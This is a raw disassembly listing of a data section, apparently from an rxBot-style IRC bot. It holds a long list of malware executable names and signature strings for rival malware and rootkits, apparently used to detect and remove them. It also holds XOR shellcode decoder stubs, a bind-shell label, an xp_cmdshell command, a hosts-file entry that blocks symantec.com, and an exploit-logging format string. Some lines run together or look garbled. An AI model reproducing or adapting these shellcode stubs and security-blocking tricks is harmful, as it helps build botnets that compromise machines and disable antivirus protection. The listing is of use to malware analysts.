align 4
aMsserrv32_exe db 'MSSERRV32.EXE',0 ; DATA XREF: .text:004481C0�o
align 4
aPopwin_exe db 'POPWIN.EXE',0 ; DATA XREF: .text:004481BC�o
align 10h
aRundii32_exe db 'RUNDII32.EXE',0 ; DATA XREF: .text:004481B8�o
align 10h
aCtxad_exe db 'CTXAD.EXE',0 ; DATA XREF: .text:004481B4�o
align 4
aMshtml3_exe db 'MSHTML3.EXE',0 ; DATA XREF: .text:004481B0�o
aMshtml2_exe db 'MSHTML2.EXE',0 ; DATA XREF: .text:004481AC�o
aMshtml1_exe db 'MSHTML1.EXE',0 ; DATA XREF: .text:004481A8�o
aMshtml_exe db 'MSHTML.EXE',0 ; DATA XREF: .text:004481A4�o
align 4
aNdrv_exe db 'NDRV.EXE',0 ; DATA XREF: .text:004481A0�o
align 4
aTskmgr_exe db 'TSKMGR.EXE',0 ; DATA XREF: .text:0044819C�o
align 4
aPapersrv_exe db 'PAPERSRV.EXE',0 ; DATA XREF: .text:00448198�o
align 4
aIe7_exe db 'IE7.EXE',0 ; DATA XREF: .text:00448194�o
aIe6_exe db 'IE6.EXE',0 ; DATA XREF: .text:00448190�o
aTaskmngr32_exe db 'TASKMNGR32.EXE',0 ; DATA XREF: .text:0044818C�o
align 4
aW32gen_exe db 'W32GEN.EXE',0 ; DATA XREF: .text:00448188�o
align 10h
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .text:00448184�o
; .text:00448458�o
align 4
aBot_exe db 'BOT.EXE',0 ; DATA XREF: .text:00448180�o
aCrxbot_exe db 'CRXBOT.EXE',0 ; DATA XREF: .text:0044817C�o
align 10h
aDns32_exerxbot db 'DNS32.EXERXBOT.EXE',0 ; DATA XREF: .text:00448178�o
align 4
aDnssvc_exe db 'DNSSVC.EXE',0 ; DATA XREF: .text:00448174�o
align 10h
aDnssrv_exe db 'DNSSRV.EXE',0 ; DATA XREF: .text:00448170�o
align 4
aWin32update_ex db 'WIN32UPDATE.EXE',0 ; DATA XREF: .text:0044816C�o
aWinsvc_exe db 'WINSVC.EXE',0 ; DATA XREF: .text:00448168�o
align 4
aScsrc_exe db 'SCSRC.EXE',0 ; DATA XREF: .text:00448164�o
align 4
aWservices_exe db 'WSERVICES.EXE',0 ; DATA XREF: .text:00448160�o
align 4
aWservice_exe db 'WSERVICE.EXE',0 ; DATA XREF: .text:0044815C�o
align 4
aWinime_exe db 'WINIME.EXE',0 ; DATA XREF: .text:00448158�o
align 10h
aLinewsrv_exe db 'LINEWSRV.EXE',0 ; DATA XREF: .text:00448154�o
align 10h
aMicrosoft_exe db 'MICROSOFT.EXE',0 ; DATA XREF: .text:00448150�o
align 10h
aServices32_exe db 'SERVICES32.EXE',0 ; DATA XREF: .text:0044814C�o
align 10h
aWgareg_exe db 'WGAREG.EXE',0 ; DATA XREF: .text:00448148�o
align 4
aAsn1sys_exe db 'ASN1SYS.EXE',0 ; DATA XREF: .text:00448144�o
aIiexplorer_exe db 'IIEXPLORER.EXE',0 ; DATA XREF: .text:00448140�o
align 4
aIiexplore_exe db 'IIEXPLORE.EXE',0 ; DATA XREF: .text:0044813C�o
align 4
aLsass_32_exe db 'LSASS_32.EXE',0 ; DATA XREF: .text:00448138�o
align 4
aSssvhost_exe db 'SSSVHOST.EXE',0 ; DATA XREF: .text:00448134�o
align 4
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .text:00448130�o
align 4
aSpoolvs_exe db 'SPOOLVS.EXE',0 ; DATA XREF: .text:0044812C�o
aSpoolv_exe db 'SPOOLV.EXE',0 ; DATA XREF: .text:00448128�o
align 10h
aMsnmsgrr_exe db 'MSNMSGRR.EXE',0 ; DATA XREF: .text:00448124�o
align 10h
aMsmmsgr_exe db 'MSMMSGR.EXE',0 ; DATA XREF: .text:00448120�o
aMsner_exe db 'MSNER.EXE',0 ; DATA XREF: .text:0044811C�o
align 4
aMsnupdater_exe db 'MSNUPDATER.EXE',0 ; DATA XREF: .text:00448118�o
align 4
aMsnupdate_exe db 'MSNUPDATE.EXE',0 ; DATA XREF: .text:00448114�o
align 4
aAlg32_exe db 'ALG32.EXE',0 ; DATA XREF: .text:00448110�o
align 4
aInstall_sp_exe db 'INSTALL_SP.EXE',0 ; DATA XREF: .text:0044810C�o
align 4
aTmrservice_exe db 'TMRSERVICE.EXE',0 ; DATA XREF: .text:00448108�o
align 4
aMsnplus_exe db 'MSNPLUS.EXE',0 ; DATA XREF: .text:00448104�o
aMsmpls_exe db 'MSMPLS.EXE',0 ; DATA XREF: .text:00448100�o
align 4
aYesbron_com db 'YESBRON.COM',0 ; DATA XREF: .text:004480FC�o
aWinlogon32_exe db 'WINLOGON32.EXE',0 ; DATA XREF: .text:004480F8�o
align 4
aWinl0gin_exe db 'WINL0GIN.EXE',0 ; DATA XREF: .text:004480F4�o
align 4
aWinl0gon_exe db 'WINL0GON.EXE',0 ; DATA XREF: .text:004480F0�o
align 4
aAk_exe db 'AK.EXE',0 ; DATA XREF: .text:004480EC�o
align 10h
aAkwid_exe db 'AKWID.EXE',0 ; DATA XREF: .text:004480E8�o
align 4
aSyser_exe db 'SYSER.EXE',0 ; DATA XREF: .text:004480E4�o
align 4
aWinupd_exe db 'WINUPD.EXE',0 ; DATA XREF: .text:004480E0�o
align 4
aSys_exe db 'SYS.EXE',0 ; DATA XREF: .text:004480DC�o
aWinrpc_exe db 'WINRPC.EXE',0 ; DATA XREF: .text:004480D8�o
align 4
aLsass32_exe db 'LSASS32.EXE',0 ; DATA XREF: .text:004480D4�o
aMsdevelop_exe db 'MSDEVELOP.EXE',0 ; DATA XREF: .text:004480D0�o
align 4
aNetmsn_exe db 'NETMSN.EXE',0 ; DATA XREF: .text:004480CC�o
align 10h
aWinsockx32_exe db 'WINSOCKX32.EXE',0 ; DATA XREF: .text:004480C8�o
align 10h
aSserrvv_exe db 'SSERRVV.EXE',0 ; DATA XREF: .text:004480C4�o
aWinsys_32_exe db 'WINSYS_32.EXE',0 ; DATA XREF: .text:004480C0�o
align 4
aSerrv_exe db 'SERRV.EXE',0 ; DATA XREF: .text:004480BC�o
align 4
aMysvcc_exe db 'MYSVCC.EXE',0 ; DATA XREF: .text:004480B8�o
align 4
aSpoolss_exe db 'SPOOLSS.EXE',0 ; DATA XREF: .text:004480B4�o
; .text:0044856C�o
aNtsf_exe db 'NTSF.EXE',0 ; DATA XREF: .text:004480B0�o
; .text:00448578�o
align 4
aWks_exe db 'WKS.EXE',0 ; DATA XREF: .text:004480A8�o
aBingo_exe db 'BINGO.EXE',0 ; DATA XREF: .text:004480A4�o
align 10h
aBingoo_exe db 'BINGOO.EXE',0
align 4
aScrhost_exe db 'SCRHOST.EXE',0
aSvlhost_exe db 'SVLHOST.EXE',0
aWinsini_exe db 'WINSINI.EXE',0
aAaaamon_exe db 'AAAAMON.EXE',0
aDpnwsock_exe db 'DPNWSOCK.EXE',0 ; DATA XREF: .text:0044808C�o
align 4
aLmhsvc_exe db 'LMHSVC.EXE',0
align 4
aS32evnt1_exe db 'S32EVNT1.EXE',0
align 4
aDmloader_exe db 'DMLOADER.EXE',0 ; DATA XREF: .text:00448080�o
align 4
aDskquota_exe db 'DSKQUOTA.EXE',0
align 4
aCatsrv_exe db 'CATSRV.EXE',0
align 4
aRasapi32_exe db 'RASAPI32.EXE',0
align 4
aWintemp_exe db 'WINTEMP.EXE',0
aDrives_exe db 'DRIVES.EXE',0
align 4
aIrdvxc_exe db 'IRDVXC.EXE',0
align 4
aCashback_exe db 'CASHBACK.EXE',0
align 4
aMsusb_exe db 'MSUSB.EXE',0 ; DATA XREF: .text:00448060�o
align 4
aMsupsrv_exe db 'MSUPSRV.EXE',0 ; DATA XREF: .text:0044805C�o
aMsjava_exe db 'MSJAVA.EXE',0 ; DATA XREF: .text:00448058�o
align 4
aMsJava_exe db 'MS-JAVA.EXE',0 ; DATA XREF: .text:00448054�o
aWininet_exe db 'WININET.EXE',0
aWiniogin_exe db 'WINIOGIN.EXE',0
align 4
aMsxml_exe db 'MSXML.EXE',0
align 10h
aNetapi1_exe db 'NETAPI[1].EXE',0
align 10h
aNetapi32_exe db 'NETAPI32.EXE',0
align 10h
aNetapi_exe db 'NETAPI.EXE',0
align 4
aWinrnr_exe db 'WINRNR.EXE',0
align 4
aWallpap1_exe db 'WALLPAP[1].EXE',0
align 4
aWallpap_exe db 'WALLPAP.EXE',0
aWinsysmngr32_e db 'WINSYSMNGR32.EXE',0
align 4
aWinload_exe db 'WINLOAD.EXE',0
aWincmd_exe db 'WINCMD.EXE',0
align 10h
aNetlogon_exe db 'NETLOGON.EXE',0
align 10h
aExplorer32_exe db 'EXPLORER32.EXE',0
align 10h
aDihf_exe db 'DIHF.EXE',0
align 4
aWintask32_exe db 'WINTASK32.EXE',0 ; DATA XREF: .text:00448014�o
align 4
aWincodecs_exe db 'WINCODECS.EXE',0
align 4
aSxserv101_exe db 'SXSERV101.EXE',0
align 4
aMssecure32_exe db 'MSSECURE32.EXE',0
align 4
aMsexplore_exe db 'MSEXPLORE.EXE',0
align 4
aDllsys64_exe db 'DLLSYS64.EXE',0
align 4
aSvchozt_exe db 'SVCHOZT.EXE',0
aLibsys32_exe db 'LIBSYS32.EXE',0
align 4
aDllmgr64_exe db 'DLLMGR64.EXE',0
align 4
aCrsscs_exe db 'CRSSCS.EXE',0
align 4
aCrsss_exe db 'CRSSS.EXE',0
align 10h
aSmsss_exe db 'SMSSS.EXE',0
align 4
aLsasss_exe db 'LSASSS.EXE',0
align 4
aRofl_exe db 'ROFL.EXE',0
align 4
aLol_exe db 'LOL.EXE',0
aRotflz_exe db 'ROTFLZ.EXE',0
align 4
aSvwhost32_exe db 'SVWHOST32.EXE',0
align 4
aIelower2_exe db 'IELOWER2.EXE',0
align 4
aIelower_exe db 'IELOWER.EXE',0
aLower_exe db 'LOWER.EXE',0
align 10h
aBl0w_exe db 'BL0W.EXE',0
align 4
aSvch0st_exe db 'SVCH0ST.EXE',0
aWinupdates_exe db 'WINUPDATES.EXE',0 ; DATA XREF: .text:004481D8�o
align 4
aWkssr_exe db 'WKSSR.EXE',0
align 4
aPerfont_exe db 'PERFONT.EXE',0
aQttask_bat db 'QTTASK.BAT',0
align 4
aMsupdate_exe db 'MSUPDATE.EXE',0
align 4
aMsnxplive_exe db 'MSNXPLIVE.EXE',0
align 4
aSalvage_exe db 'SALVAGE.EXE',0
aFhm_exe db 'FHM.EXE',0
aMscrash_exe db 'MSCRASH.EXE',0
aRecsl_exe db 'RECSL.EXE',0 ; DATA XREF: .text:004483F8�o
align 4
aBrwconf_exe db 'BRWCONF.EXE',0
aMsserv32_exe db 'MSSERV32.EXE',0 ; DATA XREF: .text:004481C4�o
align 4
aM2_2_exe db 'M2.2.EXE',0
align 10h
aWindir32_exe db 'WINDIR32.EXE',0
align 10h
aZango_exe db 'ZANGO.EXE',0
align 4
aRunjava_exe db 'RUNJAVA.EXE',0
aServicent_exe db 'SERVICENT.EXE',0
align 4
aCsvhost_exe db 'CSVHOST.EXE',0
aMs32_exe db 'MS32.EXE',0
align 10h
aW32_exe db 'W32.EXE',0 ; DATA XREF: .text:00448240�o
aZ_exe db 'Z.EXE',0
align 10h
aDll64_exe db 'DLL64.EXE',0
align 4
aServ454_exe db 'SERV454.EXE',0
aMsie701_exe db 'MSIE701.EXE',0
aWinrarx_exe db 'WINRARX.EXE',0 ; DATA XREF: .text:00448250�o
aUpdate32_exe db 'UPDATE32.EXE',0
align 10h
aGreen_exe db 'GREEN.EXE',0
align 4
aBling_exe db 'BLING.EXE',0
align 4
aCrssr_exe db 'CRSSR.EXE',0
align 4
aWnl_exe db 'WNL.EXE',0
aOwinssap_exe db 'OWINSSAP.EXE',0
align 4
aSvchost32_exe db 'SVCHOST32.EXE',0 ; DATA XREF: .text:00448548�o
align 4
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .text:00448900�o
align 4
aRbot_exe db 'RBOT.EXE',0
align 4
aSvhost32_exe db 'SVHOST32.EXE',0
align 4
aSvhostcs32_exe db 'SVHOSTCS32.EXE',0 ; DATA XREF: .text:004480AC�o
; .text:0044844C�o
align 4
aSms_exe db 'SMS.EXE',0
aSeekmo_exe db 'SEEKMO.EXE',0
align 4
aSass_exe db 'SASS.EXE',0
align 4
aShost_exe db 'SHOST.EXE',0
align 4
aSys32_exe db 'SYS32.EXE',0
align 10h
aSvcchosst_exe db 'SVCCHOSST.EXE',0
align 10h
aBotpacked_exe db 'BOTPACKED.EXE',0
align 10h
aExxplorer_exe db 'EXXPLORER.EXE',0
align 10h
aIexplore7_exe db 'IEXPLORE7.EXE',0
align 10h
aIexplore6_exe db 'IEXPLORE6.EXE',0
align 10h
aIexplor_exe db 'IEXPLOR.EXE',0
aPenis32_exe db 'PENIS32.EXE',0
aWorm32_exe db 'WORM32.EXE',0
align 4
aC27d8fefD7ae42 db 'C27D8FEF-D7AE-42C0-82E6-F30598265639.EXE',0
align 10h
aScrtkfg_exe db 'SCRTKFG.EXE',0
aMsappview32_ex db 'MSAPPVIEW32.EXE',0
aSavenow_exe db 'savenow.exe',0
aX_exe db 'x.exe',0
align 10h
aRas2_exe db 'ras2.exe',0
align 4
aSvhcost_exe db 'svhcost.exe',0
aIpcscan_exe db 'ipcscan.exe',0
aNtdll64_exe db 'ntdll64.exe',0
aMsr_exe db 'msr.exe',0
aWgavm_exe_0 db 'wgavm.exe',0
align 4
aWgareg_exe_0 db 'wgareg.exe',0
align 10h
aCmd32_exe db 'cmd32.exe',0
align 4
aKspoold_exe db 'kspoold.exe',0
aHosts_exe db 'hosts.exe',0
align 4
aSvchost32_ex_0 db 'svchost32.exe',0
align 4
aWiniogon_exe_0 db 'winiogon.exe',0
align 4
aIsass_exe_0 db 'isass.exe',0
align 10h
a1sass_exe db '1sass.exe',0
align 4
aMsrsys32_exe db 'msrsys32.exe',0
align 4
aSmsc32_exe db 'smsc32.exe',0
align 4
aSysmgr_exe db 'sysmgr.exe',0
align 4
aSpooisv_exe_0 db 'spooisv.exe',0
aFun_exe db 'fun.exe',0
aAlgs_exe db 'algs.exe',0
align 4
aSvhost_exe_0 db 'svhost.exe',0 ; DATA XREF: .text:00447E94�o
align 10h
aKernel32_exe_0 db 'kernel32.exe',0 ; DATA XREF: .text:00447E90�o
align 10h
aMsblast_exe_0 db 'msblast.exe',0 ; DATA XREF: .text:00447E8C�o
aPenis32_exe_0 db 'penis32.exe',0 ; DATA XREF: .text:00447E88�o
aPenis_exe db 'penis.exe',0 ; DATA XREF: .text:00447E84�o
align 4
aWorm32_exe_0 db 'worm32.exe',0 ; DATA XREF: .text:00447E80�o
align 10h
aMsile_exe db 'msile.exe',0 ; DATA XREF: .text:00447E7C�o
align 4
aSsms_exe db 'ssms.exe',0 ; DATA XREF: .text:00447E78�o
align 4
aEraseme_exe_0 db 'ERASEME*.EXE',0 ; DATA XREF: .text:00447E74�o
align 4
aEraseme_exe_1 db 'eraseme*.exe',0 ; DATA XREF: .text:00447E70�o
align 4
a_tmp_exe db '*.TMP.EXE',0 ; DATA XREF: .text:00447E6C�o
align 4
a_tmp_exe_0 db '*.tmp.exe',0 ; DATA XREF: .text:off_447E68�o
align 10h
dword_44C980 dd 4E56025Bh, 5D023A43h, 20732520h, 7325202Dh, 25202D20h
; DATA XREF: .text:00447E5C�o
dd 73h
dword_44C998 dd 65676152h, 2E746F42h, 42hdword_44C9A4 dd 2C343103h, 5B3A2E31h, 2C353103h, 47417231h, 546F4245h
; DATA XREF: .text:00447E54�o
dd 2C343103h, 2E3A5D31h, 2C353103h, 31h
dword_44C9C8 dd 65676152h, 2E746F42h, 41haExploitingSUse db '(Exploiting: %s User: %s / Pass: %s',0Dh,0Ah
; DATA XREF: .text:00447E4C�o
db ')',0
align 4
aNtbot_b db 'NTBot.B',0 ; DATA XREF: .text:00447E48�o
aStaticConstUns db 'static const unsigned long crc32tab[256] = {',0
; DATA XREF: .text:00447E44�o
align 4
aNtbot_a db 'NTBot.A',0 ; DATA XREF: .text:00447E40�o
; ---------------------------------------------------------------------------
loc_44CA3C: ; DATA XREF: .text:00447E3C�o
jmp short near ptr word_44CA4E
; ---------------------------------------------------------------------------
dw 4A5Ah
; ---------------------------------------------------------------------------
xor ecx, ecx
mov cx, 13Ch
loc_44CA46: ; CODE XREF: .text:0044CA4A�j
xor byte ptr [edx+ecx], 99h
loop loc_44CA46
; ---------------------------------------------------------------------------
db 2 dup(0)
word_44CA4E dw 0 ; CODE XREF: .text:loc_44CA3C�j
dd 70747448h, 432E4C44h, 2E65646Fh, 41h
aHttpWww_fireda db 'http://www.firedaemon.com',0
align 4
aFiredaemon_b db 'FireDaemon.B',0 ; DATA XREF: .text:00447E30�o
align 4
aCopyrightC2007 db 'Copyright (c) 2007 FireDaemon Technologies Limited',0
; DATA XREF: .text:00447E2C�o
align 10h
aFiredaemon_a db 'FireDaemon.A',0 ; DATA XREF: .text:00447E28�o
align 10h
aStrncpyWolffdi db 'strncpy(wolffdir, xdccdir, MAX_PATH); strncat(wolffdir, "\wolff",'
db ' MAX_PATH)',0
aWolf_kit db 'Wolf.Kit',0
align 4
aDefineHe4_hook db '#define HE4_HOOK_INV_VERSION 0x20001005',0
db 0
aHe4hookrootkit db 'He4HookRootkit-v2.15b',0
align 4
aMsdirectx_sys db 'msdirectx.sys',0
align 4
aFu_driver_b db 'FU.Driver.b',0
aRdriv_sys db 'rdriv.sys',0
align 4
aFu_driver_a db 'FU.Driver.a',0
dd 301B3015h, 3054304Ah, 3067305Eh, 30AB3087h, 30C230B1h
dd 31C331B7h, 31DB31CFh, 327A31F5h, 338E332Fh, 33A7339Ah
dd 343233AFh, 3442343Ah, 345A344Fh, 34E634B3h, 34F834EFh
dd 350A3501h, 351C3513h, 357E3524h, 366B3589h, 369C3688h
dd 36C336BAh, 36EE36E4h, 37133709h, 377C3775h, 3797378Bh
dd 391A37B1h, 39333924h, 39B13943h, 3A0B3A05h, 3A243A16h
dd 3A453A3Ah, 3A643A55h, 3A783A69h, 3A913A8Bh, 3AAD3A9Eh
dd 3AC23AB9h, 3ADE3AD8h, 0
aFu_rootkit_dri db 'FU.Rootkit.Driver',0
align 4
aStaticCharAc_d db 'static CHAR ac_driverName[] = "msdirectx.sys',0
align 4
aFu_rootkit_c db 'FU.Rootkit.c',0
align 4
aConstWcharDevi db 'const WCHAR deviceNameBuffer[] = L"\Device\msdirectx',0
align 4
aFu_rootkit_b db 'FU.Rootkit.b',0
align 4
aDefineFile_dev db '#define FILE_DEVICE_ROOTKIT 0x00002a7b',0
aFu_rootkit_a db 'FU.Rootkit.a',0 ; DATA XREF: .text:00447DE8�o
align 10h
aImportMsnMsnme db '#import "MSN/MSNMessengerAPI.tlb" named_guids, no_namespace',0
; DATA XREF: .text:00447DE4�o
aMsnbot_b db 'MSNBot.b',0 ; DATA XREF: .text:00447DE0�o
align 4
aStaticConstCha db 'static const char *msg_english[] = {',0 ; DATA XREF: .text:00447DDC�o
align 10h
aMsnbot_a db 'MSNBot.a',0 ; DATA XREF: .text:00447DD8�o
align 4
aNircomline db 'NirComLine',0 ; DATA XREF: .text:00447DD0�o
; .text:00447DD4�o
align 4
aPipeEpmapper db 'pipe\epmapper\',0 ; DATA XREF: .text:00447DCC�o
align 4
aDcomOldScan db 'Dcom-Old-Scan',0 ; DATA XREF: .text:00447DC8�o
align 4
aR0lgodlhfaauak db 'R0lGODlhFAAUAKIAAAAAAP//////93d3cDAwIaGhgQEBP//////wAAACH5BAEAAAY'
; DATA XREF: .text:00447DC4�o
db 'ALAAAAAAUABQAAAM8',0
align 4
aC99 db 'c99',0 ; DATA XREF: .text:00447DC0�o
aI2luy2x1zgugph db 'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZ'
; DATA XREF: .text:00447DBC�o
db 'SA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZG'
db 'UgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJ'
db 'nYyxhcmd2KQ0KaW50I',0
align 4
aR57 db 'r57',0 ; DATA XREF: .text:00447DB8�o
aHiderunHiddenA db 'HideRun -- hidden application launcher.',0 ; DATA XREF: .text:00447DB4�o
aHiderun db 'HideRun',0 ; DATA XREF: .text:00447DB0�o
aSoftwareAdrian db 'Software\Adrian Lopez\HideWindow\Preferences HideWindow',0
; DATA XREF: .text:00447DAC�o
aHiderGui db 'Hider-Gui',0 ; DATA XREF: .text:00447DA8�o
align 10h
aSoftwareMicr_6 db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
; DATA XREF: .text:00447DA4�o
db '\3',0
aLowerzones db 'LowerZones',0 ; DATA XREF: .text:00447DA0�o
align 10h
aWindowsupdate_ db 'windowsupdate.com',0 ; DATA XREF: .text:00447D9C�o
align 4
aMsblast db 'MsBlast',0 ; DATA XREF: .text:00447D98�o
dword_44CFCC dd 0FFFFFF43h, 1303030h, 282B1F0Ah, 132A12Bh, 0aBeagle db 'Beagle',0 ; DATA XREF: .text:00447D90�o
align 4
aDonateToTheHur db 'Donate to the Hurricane Katrina relief effort.',0
; DATA XREF: .text:00447D8C�o
align 4
aBobic_b db 'Bobic.B',0 ; DATA XREF: .text:00447D88�o
aOsamaBinLadenC db 'Osama Bin Laden Captured.',0 ; DATA XREF: .text:00447D84�o
align 4
aBobic_a db 'Bobic.A',0 ; DATA XREF: .text:00447D80�o
; ---------------------------------------------------------------------------
loc_44D044: ; DATA XREF: .text:00447D7C�o
jmp short loc_44D055
; ---------------------------------------------------------------------------
loc_44D046: ; CODE XREF: .text:loc_44D055�p
pop ebx
xor ecx, ecx
sub cx, 0FFEEh
loc_44D04D: ; CODE XREF: .text:0044D051�j
xor byte ptr [ebx], 55h
inc ebx
loop loc_44D04D
jmp short near ptr word_44D05A
; ---------------------------------------------------------------------------
loc_44D055: ; CODE XREF: .text:loc_44D044�j
call loc_44D046
; ---------------------------------------------------------------------------
word_44D05A dw 0 ; CODE XREF: .text:0044D053�j
dword_44D05C dd 69614D49h, 68532E6Ch, 6C6C65hdword_44D068 dd 0D959506Ah, 2474D9EEh, 73815BF4h, 6F8C0F13h, 0
; DATA XREF: .text:00447D74�o
dword_44D07C dd 77537049h, 68637469h, 6568532Eh, 6C6Ch; ---------------------------------------------------------------------------
loc_44D08C: ; DATA XREF: .text:00447D6C�o
jmp short near ptr word_44D0FE
; ---------------------------------------------------------------------------
dw 3356h
dd 408B64C0h, 78C08530h, 0C408B0Ch, 0
dword_44D0A0 dd 4474654Eh, 532E4544h, 6C6C6568h, 0; ---------------------------------------------------------------------------
loc_44D0B0: ; DATA XREF: .text:00447D64�o
jmp short near ptr word_44D0C2
; ---------------------------------------------------------------------------
dw 4B5Bh
; ---------------------------------------------------------------------------
xor ecx, ecx
mov cx, 125h
loc_44D0BA: ; CODE XREF: .text:0044D0BE�j
xor byte ptr [ebx+ecx], 99h
loop loc_44D0BA
; ---------------------------------------------------------------------------
db 2 dup(0)
word_44D0C2 dw 0 ; CODE XREF: .text:loc_44D0B0�j
dword_44D0C4 dd 68637653h, 2E74736Fh, 6C656853h, 6Chdword_44D0D4 dd 8166C933h, 0D9FFB0E9h, 2474D9EEh, 73815BF4h, 0
; DATA XREF: .text:00447D5C�o
dword_44D0E8 dd 63626954h, 68532E6Fh, 6C6C65h; ---------------------------------------------------------------------------
loc_44D0F4: ; DATA XREF: .text:00447D54�o
jmp short loc_44D10F
; ---------------------------------------------------------------------------
dw 315Eh
dd 89E981C9h
db 0FFh, 0
word_44D0FE dw 0 ; CODE XREF: .text:loc_44D08C�j
aOld4444shell db 'Old4444Shell',0 ; DATA XREF: .text:00447D50�o
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_44D10F: ; CODE XREF: .text:loc_44D0F4�j
; DATA XREF: .text:00447D4C�o
add [ebx+46h], dl
push esp
loc_44D113: ; DATA XREF: .text:00447D48�o
xor ds:53006925h, dh
jnz short loc_44D17D
aaa
; ---------------------------------------------------------------------------
dd 0
a022moptestmv1_ db '022¬OPtest¬v1.1',0Dh,0Ah,0 ; DATA XREF: .text:00447D44�o
align 4
aOptix db 'Optix',0 ; DATA XREF: .text:00447D40�o
align 4
aPleaz_runS db 'pleaz_run%s',0 ; DATA XREF: .text:00447D3C�o
aNetdevil db 'NetDevil',0 ; DATA XREF: .text:00447D38�o
align 4
aSystemrootSyst db '%systemroot%\system32\cmd.exe',0 ; DATA XREF: .text:00447D34�o
align 4
aVncscan db 'VNCScan',0 ; DATA XREF: .text:00447D30�o
byte_44D17C db 80h ; DATA XREF: .text:00447D2C�o
; ---------------------------------------------------------------------------
loc_44D17D: ; CODE XREF: .text:0044D119�j
bound eax, [ecx]
add bh, [ebp+1000100h]
add [esi], dl
; ---------------------------------------------------------------------------
db 8Fh
dd 182h
aIis5ssl db 'IIS5SSL',0 ; DATA XREF: .text:00447D28�o
aMain db '[MAIN]: ',0 ; DATA XREF: .text:00447D24�o
align 10h
aRxMain db 'Rx Main',0 ; DATA XREF: .text:00447D20�o
; ---------------------------------------------------------------------------
loc_44D1A8: ; DATA XREF: .text:00447D1C�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 4
aWebdav db 'WebDav',0 ; DATA XREF: .text:00447D18�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell',0 ; DATA XREF: .text:00447D14�o
align 4
aMssql_b db 'MSSQL.B',0 ; DATA XREF: .text:00447D10�o
aThcthcthcthcth db 'THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC',0
; DATA XREF: .text:00447D0C�o
align 4
aMssql_a db 'MSSQL.A',0 ; DATA XREF: .text:00447D08�o
a8d9f4e40A03d11 db '8d9f4e40-a03d-11ce-8f69-08003e30051b',0 ; DATA XREF: .text:00447D04�o
align 4
aPnp_b db 'PNP.b',0 ; DATA XREF: .text:00447D00�o
align 4
dword_44D24C dd 0E983C929h, 0D9EED9B0h, 5BF42474h, 19137381h, 0
; DATA XREF: .text:00447CFC�o
dword_44D260 dd 2E504E50h, 61hdword_44D268 dd 41435302h, 3A3A204Eh, 220hdword_44D274 dd 43207852h, 726F6C6Fh, 6E616353h, 622Eha127_0_0_1Www_s db 0Ah ; DATA XREF: .text:00447CEC�o
db '127.0.0.1',9,'www.symantec.com',0Ah,0
align 4
aChangehosts db 'ChangeHosts',0 ; DATA XREF: .text:00447CE8�o
dword_44D2B0 dd 57501C43h, 5AD1FF56h, 8430358h, 8B52F88Bh, 0dword_44D2C4 dd 6C6C6548h, 2E746F62h, 62hdword_44D2D0 dd 6C6C6548h, 2E746F62h, 61haRpcpatch_mutex db 'RpcPatch_Mutex',0 ; DATA XREF: .text:00447CD4�o
align 4
aWelchia_a db 'Welchia.a',0 ; DATA XREF: .text:00447CD0�o
align 4
aAddexExinfo db 'AddEx(exinfo)',0 ; DATA XREF: .text:00447CCC�o
align 4
aZotobForbotMod db 'Zotob/ForBot Mods',0 ; DATA XREF: .text:00447CC8�o
align 4
dword_44D31C dd 0DDCA6D6Ah, 8090F0E4h, 4A22Fh ; .text:00447CDC�o
aBlaster db 'Blaster',0 ; DATA XREF: .text:00447CC0�o
aFbsgjnerZvpe_0 db 'Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\PbzQyt32\Irefv'
; DATA XREF: .text:00447CBC�o
db 'ba',0
aMydoom_c db 'MyDoom.C',0 ; DATA XREF: .text:00447CB8�o
align 10h
aFbsgjnerZvpebf db 'Fbsgjner\Zvpebfbsg\JNO\JNO4\Jno Svyr Anzr',0
; DATA XREF: .text:00447CB4�o
align 4
aMydoom_b db 'MyDoom.B',0 ; DATA XREF: .text:00447CB0�o
align 4
dword_44D3B8 dd 9E3C1385h, 0A2hdword_44D3C0 dd 6F44794Dh, 412E6D6Fh, 2 dup(0)aSendingYouPack db '** Sending you pack #%i ("%s"), which is %sB (resume supported)',0
; DATA XREF: .text:00447CA4�o
aIrofferAll db 'Iroffer-All',0 ; DATA XREF: .text:00447CA0�o
aTotalOffered1_ db 'Total Offered: %1.1f MB Total Transferred: %1.2f %cB',0
; DATA XREF: .text:00447C9C�o
align 4
aIroffer_b db 'Iroffer.b',0 ; DATA XREF: .text:00447C98�o
align 10h
aHttpIroffer_or db 'http://iroffer.org/',0 ; DATA XREF: .text:00447C94�o
aIroffer_a db 'Iroffer.a',0 ; DATA XREF: .text:00447C90�o
align 10h
aRoot_start db 'root.start',0 ; DATA XREF: .text:00447C8C�o
align 4
aOtherbot_b db 'Otherbot.b',0 ; DATA XREF: .text:00447C88�o
align 4
aScan_start db 'scan.start',0 ; DATA XREF: .text:00447C84�o
align 4
aOtherbot_a db 'Otherbot.a',0 ; DATA XREF: .text:00447C80�o
align 10h
dword_44D4B0 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8408BADh, 0aLinkbot_shellc db 'Linkbot.Shellcode',0 ; DATA XREF: .text:00447C78�o
align 4
aRpc_c db 'RPC.c:',0 ; DATA XREF: .text:00447C74�o
align 10h
aLinkbot_rpc db 'Linkbot.RPC',0 ; DATA XREF: .text:00447C70�o
aDcom2 db 'dcom2:',0 ; DATA XREF: .text:00447C6C�o
align 4
aLinkbot_dcom_c db 'Linkbot.dcom.c',0 ; DATA XREF: .text:00447C68�o
align 4
aDcom2_c db 'dcom2.c:',0 ; DATA XREF: .text:00447C64�o
align 10h
aLinkbot_dcom_b db 'Linkbot.dcom.b',0 ; DATA XREF: .text:00447C60�o
align 10h
